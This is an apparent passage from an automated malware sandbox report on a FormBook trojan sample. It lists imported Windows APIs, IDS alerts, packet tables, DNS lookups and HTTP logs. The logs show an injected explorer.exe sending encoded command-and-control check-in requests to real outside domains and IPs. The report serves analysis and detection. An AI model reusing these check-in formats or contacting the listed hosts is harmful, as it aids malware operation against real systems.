                                                ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                10/13/21-16:32:21.743198TCP1201ATTACK-RESPONSES 403 Forbidden804979634.102.136.180192.168.2.6
                                                10/13/21-16:32:42.685873TCP1201ATTACK-RESPONSES 403 Forbidden804980934.102.136.180192.168.2.6
                                                10/13/21-16:32:48.382262TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981080192.168.2.6172.105.103.207
                                                10/13/21-16:32:48.382262TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981080192.168.2.6172.105.103.207
                                                10/13/21-16:32:48.382262TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981080192.168.2.6172.105.103.207
                                                10/13/21-16:33:00.400927TCP1201ATTACK-RESPONSES 403 Forbidden804984034.102.136.180192.168.2.6
                                                10/13/21-16:33:20.400217TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984380192.168.2.6134.122.133.171
                                                10/13/21-16:33:20.400217TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984380192.168.2.6134.122.133.171
                                                10/13/21-16:33:20.400217TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984380192.168.2.6134.122.133.171

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 13, 2021 16:32:21.611291885 CEST4979680192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:21.629221916 CEST804979634.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:21.629390001 CEST4979680192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:21.629479885 CEST4979680192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:21.647284031 CEST804979634.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:21.743197918 CEST804979634.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:21.743272066 CEST804979634.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:21.743387938 CEST4979680192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:21.743482113 CEST4979680192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:21.761204958 CEST804979634.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:26.778966904 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.827833891 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:26.828027964 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.828304052 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.876580954 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:26.878040075 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:26.878061056 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:26.878074884 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:26.878226995 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.878277063 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.878371000 CEST4979780192.168.2.694.73.147.156
                                                Oct 13, 2021 16:32:26.926930904 CEST804979794.73.147.156192.168.2.6
                                                Oct 13, 2021 16:32:31.995559931 CEST4980380192.168.2.63.223.115.185
                                                Oct 13, 2021 16:32:32.133052111 CEST80498033.223.115.185192.168.2.6
                                                Oct 13, 2021 16:32:32.133186102 CEST4980380192.168.2.63.223.115.185
                                                Oct 13, 2021 16:32:32.133338928 CEST4980380192.168.2.63.223.115.185
                                                Oct 13, 2021 16:32:32.270781994 CEST80498033.223.115.185192.168.2.6
                                                Oct 13, 2021 16:32:32.270977974 CEST4980380192.168.2.63.223.115.185
                                                Oct 13, 2021 16:32:32.271035910 CEST4980380192.168.2.63.223.115.185
                                                Oct 13, 2021 16:32:32.408277988 CEST80498033.223.115.185192.168.2.6
                                                Oct 13, 2021 16:32:37.423695087 CEST4980480192.168.2.682.98.134.154
                                                Oct 13, 2021 16:32:37.462107897 CEST804980482.98.134.154192.168.2.6
                                                Oct 13, 2021 16:32:37.462608099 CEST4980480192.168.2.682.98.134.154
                                                Oct 13, 2021 16:32:37.462970972 CEST4980480192.168.2.682.98.134.154
                                                Oct 13, 2021 16:32:37.501425982 CEST804980482.98.134.154192.168.2.6
                                                Oct 13, 2021 16:32:37.501957893 CEST804980482.98.134.154192.168.2.6
                                                Oct 13, 2021 16:32:37.501981020 CEST804980482.98.134.154192.168.2.6
                                                Oct 13, 2021 16:32:37.502202034 CEST4980480192.168.2.682.98.134.154
                                                Oct 13, 2021 16:32:37.502230883 CEST4980480192.168.2.682.98.134.154
                                                Oct 13, 2021 16:32:37.540597916 CEST804980482.98.134.154192.168.2.6
                                                Oct 13, 2021 16:32:42.552027941 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:42.570043087 CEST804980934.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:42.570606947 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:42.570636034 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:42.589291096 CEST804980934.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:42.685873032 CEST804980934.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:42.685899019 CEST804980934.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:42.686481953 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:42.686516047 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:43.038979053 CEST4980980192.168.2.634.102.136.180
                                                Oct 13, 2021 16:32:43.057055950 CEST804980934.102.136.180192.168.2.6
                                                Oct 13, 2021 16:32:47.810384989 CEST4981080192.168.2.6172.105.103.207
                                                Oct 13, 2021 16:32:48.380736113 CEST8049810172.105.103.207192.168.2.6
                                                Oct 13, 2021 16:32:48.381952047 CEST4981080192.168.2.6172.105.103.207
                                                Oct 13, 2021 16:32:48.382261992 CEST4981080192.168.2.6172.105.103.207
                                                Oct 13, 2021 16:32:48.885271072 CEST4981080192.168.2.6172.105.103.207
                                                Oct 13, 2021 16:32:49.387250900 CEST8049810172.105.103.207192.168.2.6
                                                Oct 13, 2021 16:32:49.389600039 CEST8049810172.105.103.207192.168.2.6
                                                Oct 13, 2021 16:32:49.389750957 CEST4981080192.168.2.6172.105.103.207
                                                Oct 13, 2021 16:32:53.954910994 CEST4982280192.168.2.652.206.159.80
                                                Oct 13, 2021 16:32:54.092483044 CEST804982252.206.159.80192.168.2.6
                                                Oct 13, 2021 16:32:54.093113899 CEST4982280192.168.2.652.206.159.80
                                                Oct 13, 2021 16:32:54.093128920 CEST4982280192.168.2.652.206.159.80
                                                Oct 13, 2021 16:32:54.231038094 CEST804982252.206.159.80192.168.2.6
                                                Oct 13, 2021 16:32:54.231328011 CEST4982280192.168.2.652.206.159.80
                                                Oct 13, 2021 16:32:54.231355906 CEST4982280192.168.2.652.206.159.80
                                                Oct 13, 2021 16:32:54.368494034 CEST804982252.206.159.80192.168.2.6
                                                Oct 13, 2021 16:33:00.267452955 CEST4984080192.168.2.634.102.136.180
                                                Oct 13, 2021 16:33:00.285463095 CEST804984034.102.136.180192.168.2.6
                                                Oct 13, 2021 16:33:00.285733938 CEST4984080192.168.2.634.102.136.180
                                                Oct 13, 2021 16:33:00.285758972 CEST4984080192.168.2.634.102.136.180
                                                Oct 13, 2021 16:33:00.303599119 CEST804984034.102.136.180192.168.2.6
                                                Oct 13, 2021 16:33:00.400927067 CEST804984034.102.136.180192.168.2.6
                                                Oct 13, 2021 16:33:00.400990963 CEST804984034.102.136.180192.168.2.6
                                                Oct 13, 2021 16:33:00.401284933 CEST4984080192.168.2.634.102.136.180
                                                Oct 13, 2021 16:33:00.480761051 CEST4984080192.168.2.634.102.136.180
                                                Oct 13, 2021 16:33:00.498707056 CEST804984034.102.136.180192.168.2.6
                                                Oct 13, 2021 16:33:05.526390076 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:05.708817005 CEST804984145.91.80.182192.168.2.6
                                                Oct 13, 2021 16:33:05.709094048 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:05.709494114 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:05.892004967 CEST804984145.91.80.182192.168.2.6
                                                Oct 13, 2021 16:33:06.203414917 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:06.303915977 CEST804984145.91.80.182192.168.2.6
                                                Oct 13, 2021 16:33:06.303946972 CEST804984145.91.80.182192.168.2.6
                                                Oct 13, 2021 16:33:06.304178953 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:06.304214954 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:06.386147976 CEST804984145.91.80.182192.168.2.6
                                                Oct 13, 2021 16:33:06.386403084 CEST4984180192.168.2.645.91.80.182
                                                Oct 13, 2021 16:33:11.301028013 CEST4984280192.168.2.662.210.5.81
                                                Oct 13, 2021 16:33:11.330210924 CEST804984262.210.5.81192.168.2.6
                                                Oct 13, 2021 16:33:11.330400944 CEST4984280192.168.2.662.210.5.81
                                                Oct 13, 2021 16:33:11.330621958 CEST4984280192.168.2.662.210.5.81
                                                Oct 13, 2021 16:33:11.359313965 CEST804984262.210.5.81192.168.2.6
                                                Oct 13, 2021 16:33:11.828660011 CEST4984280192.168.2.662.210.5.81
                                                Oct 13, 2021 16:33:11.857929945 CEST804984262.210.5.81192.168.2.6
                                                Oct 13, 2021 16:33:11.858082056 CEST4984280192.168.2.662.210.5.81

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 13, 2021 16:32:21.559715986 CEST6374553192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:21.604350090 CEST53637458.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:26.761162996 CEST5005553192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:26.777719975 CEST53500558.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:31.888350964 CEST5033953192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:31.994424105 CEST53503398.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:37.304816961 CEST6330753192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:37.421803951 CEST53633078.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:42.526494026 CEST4969453192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:42.550077915 CEST53496948.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:47.702405930 CEST5498253192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:47.809142113 CEST53549828.8.8.8192.168.2.6
                                                Oct 13, 2021 16:32:53.922291040 CEST6211653192.168.2.68.8.8.8
                                                Oct 13, 2021 16:32:53.953161001 CEST53621168.8.8.8192.168.2.6
                                                Oct 13, 2021 16:33:00.220139980 CEST6381653192.168.2.68.8.8.8
                                                Oct 13, 2021 16:33:00.266294003 CEST53638168.8.8.8192.168.2.6
                                                Oct 13, 2021 16:33:05.489540100 CEST5501453192.168.2.68.8.8.8
                                                Oct 13, 2021 16:33:05.524667978 CEST53550148.8.8.8192.168.2.6
                                                Oct 13, 2021 16:33:11.264848948 CEST6220853192.168.2.68.8.8.8
                                                Oct 13, 2021 16:33:11.299397945 CEST53622088.8.8.8192.168.2.6
                                                Oct 13, 2021 16:33:16.845551968 CEST5757453192.168.2.68.8.8.8
                                                Oct 13, 2021 16:33:17.104530096 CEST53575748.8.8.8192.168.2.6

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Oct 13, 2021 16:32:21.559715986 CEST192.168.2.68.8.8.80x6151Standard query (0)www.playstarexch.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:26.761162996 CEST192.168.2.68.8.8.80xa361Standard query (0)www.anadolu.academyA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:31.888350964 CEST192.168.2.68.8.8.80xeeceStandard query (0)www.altitudebc.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:37.304816961 CEST192.168.2.68.8.8.80xa6ffStandard query (0)www.unasolucioendesa.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:42.526494026 CEST192.168.2.68.8.8.80xcad5Standard query (0)www.elliotpioneer.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:47.702405930 CEST192.168.2.68.8.8.80x8971Standard query (0)www.thesewhitevvalls.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:53.922291040 CEST192.168.2.68.8.8.80x55aStandard query (0)www.lumberjackguitarloops.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:00.220139980 CEST192.168.2.68.8.8.80xfacbStandard query (0)www.carts-amazon.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:05.489540100 CEST192.168.2.68.8.8.80x746fStandard query (0)www.chinaopedia.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:11.264848948 CEST192.168.2.68.8.8.80x113bStandard query (0)www.atp-cayenne.comA (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:16.845551968 CEST192.168.2.68.8.8.80xc659Standard query (0)www.6233v.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Oct 13, 2021 16:32:21.604350090 CEST8.8.8.8192.168.2.60x6151No error (0)www.playstarexch.complaystarexch.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:32:21.604350090 CEST8.8.8.8192.168.2.60x6151No error (0)playstarexch.com34.102.136.180A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:26.777719975 CEST8.8.8.8192.168.2.60xa361No error (0)www.anadolu.academyanadolu.academyCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:32:26.777719975 CEST8.8.8.8192.168.2.60xa361No error (0)anadolu.academy94.73.147.156A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:31.994424105 CEST8.8.8.8192.168.2.60xeeceNo error (0)www.altitudebc.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:32:31.994424105 CEST8.8.8.8192.168.2.60xeeceNo error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:37.421803951 CEST8.8.8.8192.168.2.60xa6ffNo error (0)www.unasolucioendesa.com82.98.134.154A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:42.550077915 CEST8.8.8.8192.168.2.60xcad5No error (0)www.elliotpioneer.comelliotpioneer.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:32:42.550077915 CEST8.8.8.8192.168.2.60xcad5No error (0)elliotpioneer.com34.102.136.180A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:47.809142113 CEST8.8.8.8192.168.2.60x8971No error (0)www.thesewhitevvalls.com172.105.103.207A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:32:53.953161001 CEST8.8.8.8192.168.2.60x55aNo error (0)www.lumberjackguitarloops.compropage.beatstars.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:32:53.953161001 CEST8.8.8.8192.168.2.60x55aNo error (0)propage.beatstars.com52.206.159.80A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:00.266294003 CEST8.8.8.8192.168.2.60xfacbNo error (0)www.carts-amazon.comcarts-amazon.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:33:00.266294003 CEST8.8.8.8192.168.2.60xfacbNo error (0)carts-amazon.com34.102.136.180A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:05.524667978 CEST8.8.8.8192.168.2.60x746fNo error (0)www.chinaopedia.comchinaopedia.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:33:05.524667978 CEST8.8.8.8192.168.2.60x746fNo error (0)chinaopedia.com45.91.80.182A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:11.299397945 CEST8.8.8.8192.168.2.60x113bNo error (0)www.atp-cayenne.com62.210.5.81A (IP address)IN (0x0001)
                                                Oct 13, 2021 16:33:17.104530096 CEST8.8.8.8192.168.2.60xc659No error (0)www.6233v.comtwyg-9639v.com.txwlcdn13.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:33:17.104530096 CEST8.8.8.8192.168.2.60xc659No error (0)twyg-9639v.com.txwlcdn13.compflvcllbpf.bigbackbone.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:33:17.104530096 CEST8.8.8.8192.168.2.60xc659No error (0)pflvcllbpf.bigbackbone.compflvcllbpf.hellomyai.comCNAME (Canonical name)IN (0x0001)
                                                Oct 13, 2021 16:33:17.104530096 CEST8.8.8.8192.168.2.60xc659No error (0)pflvcllbpf.hellomyai.com134.122.133.171A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.playstarexch.com
                                                • www.anadolu.academy
                                                • www.altitudebc.com
                                                • www.unasolucioendesa.com
                                                • www.elliotpioneer.com
                                                • www.thesewhitevvalls.com
                                                • www.lumberjackguitarloops.com
                                                • www.carts-amazon.com
                                                • www.chinaopedia.com
                                                • www.atp-cayenne.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.64979634.102.136.18080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:21.629479885 CEST2211OUTGET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1
                                                Host: www.playstarexch.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:21.743197918 CEST2309INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Wed, 13 Oct 2021 14:32:21 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "615f93b1-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.64979794.73.147.15680C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:26.828304052 CEST4898OUTGET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.anadolu.academy
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:26.878040075 CEST4900INHTTP/1.1 404 Not Found
                                                Connection: close
                                                Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                Pragma: no-cache
                                                Content-Type: text/html
                                                Content-Length: 1237
                                                Date: Wed, 13 Oct 2021 14:32:26 GMT
                                                Server: LiteSpeed
                                                Vary: User-Agent
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61
                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be a


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.6498033.223.115.18580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:32.133338928 CEST4962OUTGET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1
                                                Host: www.altitudebc.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Oct 13, 2021 16:32:32.270781994 CEST4987INHTTP/1.1 302 Found
                                                Cache-Control: private
                                                Content-Type: text/html; charset=utf-8
                                                Location: https://www.hugedomains.com/domain_profile.cfm?d=altitudebc&e=com
                                                Server: Microsoft-IIS/8.5
                                                X-Powered-By: ASP.NET
                                                Date: Wed, 13 Oct 2021 14:31:35 GMT
                                                Connection: close
                                                Content-Length: 186
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 75 67 65 64 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 5f 70 72 6f 66 69 6c 65 2e 63 66 6d 3f 64 3d 61 6c 74 69 74 75 64 65 62 63 26 61 6d 70 3b 65 3d 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.hugedomains.com/domain_profile.cfm?d=altitudebc&amp;e=com">here</a>.</h2></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.64980482.98.134.15480C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Oct 13, 2021 16:32:37.462970972 CEST5528OUTGET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1
                                                Host: www.unasolucioendesa.com
                                                Connection: close
